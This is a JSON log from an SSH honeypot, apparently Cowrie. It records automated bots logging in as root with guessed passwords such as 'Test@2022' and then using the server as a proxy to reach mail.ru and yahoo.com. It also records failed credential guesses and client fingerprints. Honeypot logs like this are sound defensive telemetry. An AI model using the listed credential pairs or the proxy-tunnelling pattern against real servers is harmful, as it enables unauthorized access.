{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.751279Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":12646,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:12646","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.899685Z","session":"cc6bf5587dab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.952898Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":19602,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19602","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.099515Z","session":"cc6bf5587dab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.152755Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.206921Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50243,"dst_ip":"1.2.3.4","dst_port":22,"session":"d65c2315feed","protocol":"ssh","message":"New connection: 77.83.207.83:50243 (1.2.3.4:22) [session: d65c2315feed]","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.255101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.256202Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.305813Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.553374Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":825,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:825","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.603996Z","session":"d65c2315feed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.653753Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":8889,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8889","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.796104Z","session":"d65c2315feed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.845780Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55958,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0cea0cecf6","protocol":"ssh","message":"New connection: 212.227.125.160:55958 (1.2.3.4:22) [session: 6e0cea0cecf6]","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.940421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.941356Z","src_ip":"212.227.125.160","session":"6e0cea0cecf6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":29559,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29559","sensor":"my-vps","timestamp":"2025-08-31T03:45:38.988111Z","session":"d65c2315feed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.038111Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.088433Z","src_ip":"77.83.207.83","session":"d65c2315feed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50357,"dst_ip":"1.2.3.4","dst_port":22,"session":"31c7a2bfe909","protocol":"ssh","message":"New connection: 77.83.207.83:50357 (1.2.3.4:22) [session: 31c7a2bfe909]","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.137804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.138996Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.189165Z","src_ip":"212.227.125.160","session":"6e0cea0cecf6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.190411Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.440110Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12710,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12710","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.491236Z","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.541567Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":20847,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:20847","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.684465Z","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.734619Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":4404,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4404","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.876386Z","session":"31c7a2bfe909"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.926566Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:39.977573Z","src_ip":"77.83.207.83","session":"31c7a2bfe909"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50463,"dst_ip":"1.2.3.4","dst_port":22,"session":"52b6009668c7","protocol":"ssh","message":"New connection: 77.83.207.83:50463 (1.2.3.4:22) [session: 52b6009668c7]","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.026144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.036072Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.076381Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@12345","message":"login attempt [ubuntu/Admin@12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.235568Z","src_ip":"212.227.125.160","session":"6e0cea0cecf6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.325036Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13056,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13056","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.375448Z","session":"52b6009668c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.425186Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.528914Z","src_ip":"212.227.235.229","session":"1e043fb059c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15973,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15973","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.567948Z","session":"52b6009668c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.617751Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":30290,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30290","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.760030Z","session":"52b6009668c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.809926Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.860740Z","src_ip":"77.83.207.83","session":"52b6009668c7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50552,"dst_ip":"1.2.3.4","dst_port":22,"session":"7af41503ff30","protocol":"ssh","message":"New connection: 77.83.207.83:50552 (1.2.3.4:22) [session: 7af41503ff30]","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.911241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.921116Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:40.963373Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.217482Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19121,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19121","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.269305Z","session":"7af41503ff30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.320699Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3013,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3013","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.465308Z","session":"7af41503ff30"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.496639Z","src_ip":"212.227.125.160","session":"6e0cea0cecf6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.516245Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5534,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5534","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.661262Z","session":"7af41503ff30"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.712267Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
